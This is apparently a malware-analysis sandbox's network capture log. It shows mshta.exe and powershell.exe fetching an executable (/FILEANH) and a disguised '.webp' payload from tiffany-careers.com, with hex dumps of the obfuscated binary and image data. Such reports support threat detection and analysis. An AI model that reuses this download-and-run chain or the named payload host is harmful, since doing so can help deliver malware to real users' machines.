                                                                                                                                                                                                                  2024-12-18 20:06:00 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:06:00 UTC58INData Raw: 4d 53 2d 43 56 3a 20 46 34 36 56 6d 75 2f 74 51 45 36 75 69 37 34 31 44 34 53 56 48 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: F46Vmu/tQE6ui741D4SVHw.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  2192.168.2.64971520.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:01 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 36 6e 4c 38 57 65 4a 59 6b 45 57 77 6c 4d 45 64 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 63 35 35 34 31 33 63 61 30 61 31 39 33 33 34 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: 6nL8WeJYkEWwlMEd.1Context: 2c55413ca0a19334
                                                                                                                                                                                                                  2024-12-18 20:06:01 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                  2024-12-18 20:06:01 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 36 6e 4c 38 57 65 4a 59 6b 45 57 77 6c 4d 45 64 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 63 35 35 34 31 33 63 61 30 61 31 39 33 33 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 6nL8WeJYkEWwlMEd.2Context: 2c55413ca0a19334<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:06:01 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 36 6e 4c 38 57 65 4a 59 6b 45 57 77 6c 4d 45 64 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 63 35 35 34 31 33 63 61 30 61 31 39 33 33 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: 6nL8WeJYkEWwlMEd.3Context: 2c55413ca0a19334<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                  2024-12-18 20:06:02 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:06:02 UTC58INData Raw: 4d 53 2d 43 56 3a 20 63 6a 59 73 4f 44 79 34 41 45 4b 34 62 71 34 6e 31 75 49 33 6c 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: cjYsODy4AEK4bq4n1uI3lA.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  3192.168.2.649716147.45.49.1554431476C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:01 UTC330OUTGET /FILEANH HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Language: en-CH
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                  Host: tiffany-careers.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-12-18 20:06:02 UTC396INHTTP/1.1 200 OK
                                                                                                                                                                                                                  etag: "1328a-675f00db-25387;;;"
                                                                                                                                                                                                                  last-modified: Sun, 15 Dec 2024 16:16:27 GMT
                                                                                                                                                                                                                  content-length: 78474
                                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                                  date: Wed, 18 Dec 2024 20:06:02 GMT
                                                                                                                                                                                                                  server: LiteSpeed
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  2024-12-18 20:06:02 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 13 b2 ed 95 57 d3 83 c6 57 d3 83 c6 57 d3 83 c6 43 b8 86 c7 56 d3 83 c6 43 b8 80 c7 55 d3 83 c6 43 b8 87 c7 43 d3 83 c6 43 b8 82 c7 50 d3 83 c6 57 d3 82 c6 73 d3 83 c6 43 b8 8a c7 56 d3 83 c6 43 b8 7c c6 56 d3 83 c6 43 b8 81 c7 56 d3 83 c6 52 69 63 68 57 d3 83 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 43 9e 30 35 00 00 00
                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$WWWCVCUCCCPWsCVC|VCVRichWPELC05
                                                                                                                                                                                                                  2024-12-18 20:06:02 UTC16384INData Raw: 32 2e 64 6c 6c 00 00 6f 00 5f 58 63 70 74 46 69 6c 74 65 72 00 c9 00 5f 5f 70 5f 5f 63 6f 6d 6d 6f 64 65 00 00 11 01 5f 61 6d 73 67 5f 65 78 69 74 00 00 a1 00 5f 5f 67 65 74 6d 61 69 6e 61 72 67 73 00 e2 00 5f 5f 73 65 74 5f 61 70 70 5f 74 79 70 65 00 00 ae 04 65 78 69 74 00 00 73 01 5f 65 78 69 74 00 24 01 5f 63 65 78 69 74 00 00 ce 00 5f 5f 70 5f 5f 66 6d 6f 64 65 00 00 07 02 5f 69 73 6d 62 62 6c 65 61 64 00 00 e4 00 5f 5f 73 65 74 75 73 65 72 6d 61 74 68 65 72 72 00 00 e8 01 5f 69 6e 69 74 74 65 72 6d 00 f7 00 5f 61 63 6d 64 6c 6e 00 35 00 3f 74 65 72 6d 69 6e 61 74 65 40 40 59 41 58 58 5a 00 6d 73 76 63 72 74 2e 64 6c 6c 00 00 37 01 5f 63 6f 6e 74 72 6f 6c 66 70 00 00 6a 01 5f 65 78 63 65 70 74 5f 68 61 6e 64 6c 65 72 34 5f 63 6f 6d 6d 6f 6e 00 7f 05
                                                                                                                                                                                                                  Data Ascii: 2.dllo_XcptFilter__p__commode_amsg_exit__getmainargs__set_app_typeexits_exit$_cexit__p__fmode_ismbblead__setusermatherr_initterm_acmdln5?terminate@@YAXXZmsvcrt.dll7_controlfpj_except_handler4_common
                                                                                                                                                                                                                  2024-12-18 20:06:02 UTC16384INData Raw: 2c 56 6e 2c 52 56 2c 6f 58 2c 55 47 2c 77 4a 2c 5a 43 2c 6f 58 2c 55 47 2c 77 4a 2c 4f 67 2c 6f 58 2c 55 47 2c 77 4a 2c 5a 43 2c 6f 58 2c 55 47 2c 56 6e 2c 52 56 2c 6f 58 2c 55 47 2c 56 6e 2c 77 5a 2c 6f 58 2c 55 47 2c 77 5a 2c 4f 67 2c 6f 58 2c 55 47 2c 77 4a 2c 73 65 2c 6f 58 2c 55 47 2c 56 6e 2c 56 6e 2c 6f 58 2c 55 47 2c 77 4a 2c 77 5a 2c 6f 58 2c 55 47 2c 77 4a 2c 55 47 2c 6f 58 2c 55 47 2c 56 6e 2c 56 6e 2c 6f 58 2c 55 47 2c 77 5a 2c 4f 67 2c 6f 58 2c 55 47 2c 77 5a 2c 68 68 2c 6f 58 2c 55 47 2c 77 4a 2c 77 4a 2c 6f 58 2c 55 47 2c 77 4a 2c 68 68 2c 6f 58 2c 55 47 2c 56 6e 2c 77 5a 2c 6f 58 2c 55 47 2c 77 4a 2c 77 4a 2c 6f 58 2c 55 47 2c 77 4a 2c 69 71 2c 6f 58 2c 55 47 2c 77 4a 2c 52 56 2c 6f 58 2c 55 47 2c 77 4a 2c 69 71 2c 6f 58 2c 55 47 2c 56 6e
                                                                                                                                                                                                                  Data Ascii: ,Vn,RV,oX,UG,wJ,ZC,oX,UG,wJ,Og,oX,UG,wJ,ZC,oX,UG,Vn,RV,oX,UG,Vn,wZ,oX,UG,wZ,Og,oX,UG,wJ,se,oX,UG,Vn,Vn,oX,UG,wJ,wZ,oX,UG,wJ,UG,oX,UG,Vn,Vn,oX,UG,wZ,Og,oX,UG,wZ,hh,oX,UG,wJ,wJ,oX,UG,wJ,hh,oX,UG,Vn,wZ,oX,UG,wJ,wJ,oX,UG,wJ,iq,oX,UG,wJ,RV,oX,UG,wJ,iq,oX,UG,Vn
                                                                                                                                                                                                                  2024-12-18 20:06:02 UTC16384INData Raw: 5a 43 2c 6f 58 2c 55 47 2c 77 4a 2c 5a 43 2c 6f 58 2c 55 47 2c 56 6e 2c 77 5a 2c 6f 58 2c 55 47 2c 56 6e 2c 56 6e 2c 6f 58 2c 55 47 2c 56 6e 2c 56 6e 2c 6f 58 2c 55 47 2c 77 4a 2c 4f 67 2c 6f 58 2c 55 47 2c 77 5a 2c 68 68 2c 6f 58 2c 55 47 2c 56 6e 2c 52 56 2c 6f 58 2c 55 47 2c 56 6e 2c 56 6e 2c 6f 58 2c 55 47 2c 77 4a 2c 4f 67 2c 6f 58 2c 55 47 2c 77 4a 2c 68 68 2c 6f 58 2c 55 47 2c 77 4a 2c 69 71 2c 6f 58 2c 55 47 2c 56 6e 2c 77 5a 2c 6f 58 2c 55 47 2c 77 5a 2c 55 47 2c 6f 58 2c 55 47 2c 77 4a 2c 77 4a 2c 6f 58 2c 55 47 2c 77 4a 2c 77 5a 2c 6f 58 2c 55 47 2c 56 6e 2c 77 5a 2c 6f 58 2c 55 47 2c 77 4a 2c 56 6e 2c 6f 58 2c 55 47 2c 77 4a 2c 77 4a 2c 6f 58 2c 55 47 2c 77 4a 2c 5a 43 2c 6f 58 2c 55 47 2c 77 5a 2c 55 47 2c 6f 58 2c 55 47 2c 77 5a 2c 4f 67 2c
                                                                                                                                                                                                                  Data Ascii: ZC,oX,UG,wJ,ZC,oX,UG,Vn,wZ,oX,UG,Vn,Vn,oX,UG,Vn,Vn,oX,UG,wJ,Og,oX,UG,wZ,hh,oX,UG,Vn,RV,oX,UG,Vn,Vn,oX,UG,wJ,Og,oX,UG,wJ,hh,oX,UG,wJ,iq,oX,UG,Vn,wZ,oX,UG,wZ,UG,oX,UG,wJ,wJ,oX,UG,wJ,wZ,oX,UG,Vn,wZ,oX,UG,wJ,Vn,oX,UG,wJ,wJ,oX,UG,wJ,ZC,oX,UG,wZ,UG,oX,UG,wZ,Og,
                                                                                                                                                                                                                  2024-12-18 20:06:02 UTC12938INData Raw: 66 61 6c 73 65 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d 0a 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 73 73 65 6d 62 6c 79 3e 0d 0a 0d 0a 00 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: false" /> </requestedPrivileges> </security></trustInfo></assembly>( @


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  4192.168.2.649724147.45.49.155443612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:06 UTC82OUTGET /New_2025.webp HTTP/1.1
                                                                                                                                                                                                                  Host: tiffany-careers.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-12-18 20:06:07 UTC502INHTTP/1.1 200 OK
                                                                                                                                                                                                                  cache-control: public, max-age=604800
                                                                                                                                                                                                                  expires: Wed, 25 Dec 2024 20:06:07 GMT
                                                                                                                                                                                                                  etag: "2ddde-675eff09-25386;;;"
                                                                                                                                                                                                                  last-modified: Sun, 15 Dec 2024 16:08:41 GMT
                                                                                                                                                                                                                  content-type: image/webp
                                                                                                                                                                                                                  content-length: 187870
                                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                                  date: Wed, 18 Dec 2024 20:06:07 GMT
                                                                                                                                                                                                                  server: LiteSpeed
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  2024-12-18 20:06:07 UTC16384INData Raw: 52 49 46 46 d6 dd 02 00 57 45 42 50 56 50 38 20 ca dd 02 00 30 b5 09 9d 01 2a b0 04 20 03 3e 49 20 8c 45 22 a2 21 21 27 b4 0c 90 50 09 09 65 69 a5 b5 99 3d 38 bf 39 79 ff 5c ff 93 c8 05 89 fd 47 da a2 17 44 b2 23 6d 0f 1e ea eb e0 0d d5 ff f8 5e a5 df e8 3d 4a 3f 7a ee 50 e9 7f da fd 80 3f 98 ff 73 ff b3 e6 17 cc 0d a2 6a 38 7f 8f e3 d3 f6 2f f7 3e a2 b1 7c be 06 ac 60 6f 87 ff 77 cf 5b 99 7c a9 fb 37 e4 ff d0 fb b5 7f 83 e9 9b cd 9f 69 ff 9f f5 5d f0 57 d1 ff f5 7f c8 fe 4b 7c fd ff c3 eb 7f fb ef fc 7f 61 2f ed 5f eb 3f 69 fd ed fa 6b ff 77 ff b3 d5 0f ee 6f ed 97 bb 77 fd 8f fd 7f f3 bf 7d fe 68 7f 62 ff 65 ff 73 fd 67 fc 8f fd 1f 41 1f cf 3f b7 ff d4 fc f5 f9 a4 ff d5 ff a3 dd f3 fb 6f fe 1f fd bf f0 3e 06 bf 9a ff 93 ff 95 f9 cf f3 47 ff bf f7 37 fe
                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8 0* >I E"!!'Pei=89y\GD#m^=J?zP?sj8/>|`ow[|7i]WK|a/_?ikwow}hbesgA?o>G7
                                                                                                                                                                                                                  2024-12-18 20:06:07 UTC16384INData Raw: b5 b9 9f 93 89 a6 3f 76 ba dc 0b ab 26 87 ca af f8 05 42 dc eb 24 25 ee 06 00 bd c2 65 db eb 7e 4c 72 64 41 e2 a1 a4 97 a6 22 a3 f7 56 86 86 af d7 d9 85 3a 7b 3e a1 03 a8 ff 4b 9b fb 29 66 b5 50 45 3f bf 69 1f d2 1e e9 3a 82 3c 36 d6 3f 63 ac be cb 6d bf 15 0f 9a 8f 3e 43 f1 f8 a3 e2 a0 39 ee 6a 3d 4f 03 bd 11 0a ca 20 86 86 2f a7 7b 42 ee f9 5a 50 3f 7b 8a 94 81 83 e9 e0 f0 80 ee 64 f3 01 21 73 ae f6 68 c8 df 3d 41 bb ad 9a b5 46 f5 97 82 a8 63 1c 61 48 6f 6e 2e c6 df 74 b7 e2 aa 21 26 d5 07 81 d5 88 1c 37 4a 01 e2 5f 29 75 e4 3f 6d 06 f1 a4 bd c1 e9 77 74 26 fd 10 8b 35 6c 3c 59 e3 fe fa fe 78 4c f0 70 c4 27 44 5f d9 84 c4 7a 20 cb 62 4d 0d 70 8c 59 f5 0b c9 b3 49 c3 17 fe 09 f4 8b 56 9e 76 1a e0 55 76 97 e3 63 ed c5 e8 af 9e aa 0d 2b ac bf 8f a6 03 2f
                                                                                                                                                                                                                  Data Ascii: ?v&B$%e~LrdA"V:{>K)fPE?i:<6?cm>C9j=O /{BZP?{d!sh=AFcaHon.t!&7J_)u?mwt&5l<YxLp'D_z bMpYIVvUvc+/
                                                                                                                                                                                                                  2024-12-18 20:06:07 UTC16384INData Raw: 1b 23 a4 61 d6 c4 09 75 ab 97 ec b2 84 c4 9c 53 9c 01 5b 3a 50 bd 39 c7 23 0f 24 63 6c 78 33 98 22 84 c7 6e 0c f3 9a ab a4 1c 62 ea 01 04 01 64 5d 09 11 1d 5f 58 06 a2 8d 7d f4 35 db 55 39 cb 69 fd 98 1b e3 1b 94 48 fe 95 3a d5 54 80 22 44 50 61 1d 3e dd 90 aa 3f a4 23 00 b2 41 27 86 89 80 87 dc 51 47 6b be f2 f7 f1 67 8a f5 53 c5 38 22 9a 60 60 33 b1 7d ee 9f ff 1a 31 93 e1 95 78 71 d1 16 8e 45 32 a6 ca 92 37 c7 64 10 35 a7 4a 08 c6 34 20 86 4c e5 24 45 ac 57 23 3b f9 f1 8a 89 e7 09 44 54 0d ac 8c 5f 36 28 24 b0 c6 27 bc be c6 87 6e e6 cd df 39 7f 6c 33 fc 80 8c 56 9e bd 65 db 05 51 94 f9 c0 a5 69 b2 0f 99 33 2d 36 6d a9 eb 04 c6 7d cd 8b 0b 19 7b ae 94 72 2b 0b cb ae b3 0a cc 92 cc 46 41 88 84 88 9f 3a 39 bb 43 78 28 20 89 57 fc 6f 64 68 a3 66 05 9c 4d
                                                                                                                                                                                                                  Data Ascii: #auS[:P9#$clx3"nbd]_X}5U9iH:T"DPa>?#A'QGkgS8"``3}1xqE27d5J4 L$EW#;DT_6($'n9l3VeQi3-6m}{r+FA:9Cx( WodhfM
                                                                                                                                                                                                                  2024-12-18 20:06:08 UTC16384INData Raw: f5 ce 22 dd c5 24 36 71 b0 1d f5 b6 e5 60 fa d5 ea 8b db c2 44 7f 18 4a 16 a7 42 5f 8a 33 2b 1f dc 72 40 20 d6 95 55 d0 90 3b 5f 5b 63 9b a8 ec b9 ab 04 5f 19 4e 62 0a eb 5e ac 28 a8 9d a8 51 ad 55 98 b4 41 b4 20 e8 96 64 53 ef 26 3e 95 6a b9 17 0a 4d 77 12 73 b6 93 3b 7d 5f c1 d4 71 ea 95 b6 56 f5 d3 4b fa f2 53 d7 63 3f e4 c8 a7 c1 bc f1 bc 45 39 15 db f5 eb 6c 67 4f 9b be 1c 26 8c e3 f4 b5 57 b3 aa 56 9c 2d b5 8c dc 00 17 17 95 09 22 a3 98 6a ed 65 95 38 34 02 d3 3e ef f4 5a 18 92 d6 e9 73 46 69 c9 45 f9 0e 7e 4e bc d6 b7 2d 6a b5 b7 72 e0 34 a4 0e f7 35 3a f0 60 4b 7f 07 2a 93 82 69 3c 4f b0 27 aa 9d 5c 71 fd 77 2a f5 4c 7c e2 0c d7 af 06 ca 5a e4 9c 96 61 7c e0 4c 20 99 48 f4 7f 7d 75 6d 24 50 aa ea 17 9d 9a 49 58 c6 e5 6c a0 26 b1 a4 8a 8c 82 60 c8
                                                                                                                                                                                                                  Data Ascii: "$6q`DJB_3+r@ U;_[c_Nb^(QUA dS&>jMws;}_qVKSc?E9lgO&WV-"je84>ZsFiE~N-jr45:`K*i<O'\qw*L|Za|L H}um$PIXl&`
                                                                                                                                                                                                                  2024-12-18 20:06:08 UTC16384INData Raw: bb 37 7b a2 49 26 91 11 e4 10 11 29 95 48 54 78 cc 29 f7 4a 72 9f 01 e6 fc 99 01 69 2c be 99 50 f7 86 d7 0d c5 04 6b 83 eb fd 21 e4 f5 f8 d1 9d e1 9b 13 dd 91 06 22 bf 6b 5f fc 8c ff 4c a5 49 58 44 68 67 11 6a 31 11 3a 82 7d b2 c8 22 4f e8 20 a4 30 eb a4 ee b0 b7 87 f5 c0 3c a1 9e 58 52 ac 66 6f 66 57 5a 26 a9 a7 28 b8 6c c5 f8 89 14 31 fb ef 80 90 b2 8a b8 70 1f 09 41 f8 4f 2b 32 a2 bf 75 59 0d 73 01 22 9f 1f dd cf 5e 15 0b 65 81 b2 86 69 39 b4 7a 26 90 cd 27 d9 be 90 7a 1d 4c 3a 30 f8 3c 36 fc 8f 92 64 7b b0 58 cb 53 f1 69 6e 3c 3a 02 e6 11 7a bb 09 c2 6a 8c aa e5 52 ca 62 f6 eb 0b 2a 41 da 3d 87 b2 f9 6d f7 98 2e 20 2b 7a 2c b5 53 2b 6e dc 04 f6 4c 2f 07 1e 04 7c c8 c9 b7 f5 f9 b0 80 4a 00 a9 10 d7 f1 ca ad 56 7b 33 13 1a f2 ea ab b1 06 2c 8f 96 42 36
                                                                                                                                                                                                                  Data Ascii: 7{I&)HTx)Jri,Pk!"k_LIXDhgj1:}"O 0<XRfofWZ&(l1pAO+2uYs"^ei9z&'zL:0<6d{XSin<:zjRb*A=m. +z,S+nL/|JV{3,B6
                                                                                                                                                                                                                  2024-12-18 20:06:08 UTC16384INData Raw: 34 18 fa c3 3e 55 8b f1 c1 b8 36 b2 25 8f e1 bf d7 09 70 69 7f 7b bd 32 d2 81 ba ec 6a ce 7e 49 16 63 fa 81 be a5 0e d3 f8 bc 1b ce db bf 1c 2d f2 93 4d bf 75 3d fd db e1 18 a6 a2 ef 20 81 65 43 df b8 b2 e4 2b 16 88 72 e6 35 03 7e 8d 8a ef d9 a6 a5 86 4c a6 f5 c6 f7 ea 96 ce c2 d7 cc 7c 26 ff b7 86 7a a3 c9 6e 26 d3 fc ec 33 a2 40 6e 04 0e 1a 69 bb 76 ba 12 79 d5 cb ff f8 dd 8f ca ea 7a 39 0c 2e 26 18 b4 d9 44 a8 85 d1 d4 e6 f4 8f 56 07 c8 e7 9a 4e d3 bb 47 4f 4e 82 4c 4d d3 b0 6f b2 1e a3 01 e1 d7 32 1b 9c c8 2c ec 5c 04 e9 22 db 70 5a 4d 6b a4 77 38 17 ad 23 49 92 ce a3 93 de 4e b5 cb 76 09 74 2e d3 73 de a4 45 0d ac e1 9a db 42 24 57 ef 24 5a 96 40 31 05 e4 01 3b fa 39 31 67 e6 44 ba ba 8b fd b2 62 41 2d fa b8 c7 5d 72 3f 9b 59 17 06 cb a4 af 26 cf 1a
                                                                                                                                                                                                                  Data Ascii: 4>U6%pi{2j~Ic-Mu= eC+r5~L|&zn&3@nivyz9.&DVNGONLMo2,\"pZMkw8#INvt.sEB$W$Z@1;91gDbA-]r?Y&
                                                                                                                                                                                                                  2024-12-18 20:06:08 UTC16384INData Raw: 38 e1 a5 4b e4 5e 6a 5c 3d 37 a2 79 4c b3 c3 af b0 2e d6 da d9 a4 e0 be 31 55 1c 91 c0 d1 5e 2f 62 47 0a 28 ff 5e ef 5b db 90 6d c6 4b 7d 79 f9 66 7a 4b 57 b1 6e 11 e2 1d 70 e2 c6 9a c3 fd 2f 8b 40 54 1d 03 f9 99 09 ef e6 d3 1f 40 20 0f 94 c2 c7 f1 3c 71 ce 11 fd 3d 30 95 d5 89 30 c5 5f 80 f0 06 a1 4b fe 21 22 b7 6e f4 82 65 b6 9d 74 e7 92 42 d9 25 01 9a 45 e1 eb 8f 07 4b 1d 9c d8 93 a5 27 6c c1 2e 57 87 81 32 fd f6 bc e5 f4 ef 45 17 ad e9 61 4e 56 8c c6 3f fc 8b 17 51 68 e2 4a bc a5 ef 94 e5 7d 9a 81 96 78 e5 a9 42 54 39 da b6 f5 0f ae e5 c1 64 46 0a c3 9d 62 ca 0a 89 2a e0 6c 9f 79 b4 38 3d 3e e9 85 db e4 dd e1 4c 3d ac c8 56 d9 00 72 20 52 95 bb 46 49 f0 d5 74 a4 39 82 22 29 e2 8a 8c a0 c2 d9 63 81 ae 80 e8 04 a6 8a 62 16 e1 bc 49 f2 c8 ce d2 b8 bf d7
                                                                                                                                                                                                                  Data Ascii: 8K^j\=7yL.1U^/bG(^[mK}yfzKWnp/@T@ <q=00_K!"netB%EK'l.W2EaNV?QhJ}xBT9dFb*ly8=>L=Vr RFIt9")cbI
